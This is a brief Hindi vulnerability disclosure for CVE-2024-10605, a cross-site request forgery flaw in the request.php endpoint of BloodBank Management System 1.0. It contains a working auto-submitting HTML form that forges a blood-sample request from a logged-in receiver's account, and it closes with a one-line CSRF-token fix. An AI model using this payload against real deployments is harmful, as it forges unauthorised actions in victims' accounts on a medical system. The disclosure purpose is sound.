
CVE-2024-10605 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, BloodBank प्रबंधन प्रणाली 1.0 में एक CSRF भेद्यता जो अनधिकृत रक्त नमूना अनुरोधों की अनुमति देती है।
file/request.phpइस एंडपॉइंट /file/request.php पर क्रॉस साइट रिक्वेस्ट फोर्जरी मौजूद है, जो एक दूरस्थ उपयोगकर्ता को किसी लॉग-इन रिसीवर के खाते से, चयनित अस्पताल के उपलब्ध रक्त नमूने से रक्त नमूना अनुरोध शुरू करने की अनुमति देता है।
सफल शोषण से पीड़ित की ओर से अनधिकृत कार्य हो सकते हैं। इसके अलावा, इसका शोषण पेलोड के साथ दुर्भावनापूर्ण वेबसाइटों पर जाकर भी किया जा सकता है।
नीचे एक CSRF POC हमले का उदाहरण दिया गया है जो लॉग-इन रिसीवर के खाते से रक्त नमूना अनुरोध शुरू करता है:
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://localhost.local/bloodbank/file/request.php" method="POST" enctype="application/x-www-form-urlencoded">
<input name="bid" value="16">
<input name="hid" value="3">
<input name="bg" value="B-">
<input name="request" value="Request+Sample">
</form>
<script>
document.querySelector("form").submit();
</script>
</body>
</html>
csrf टोकन डालें।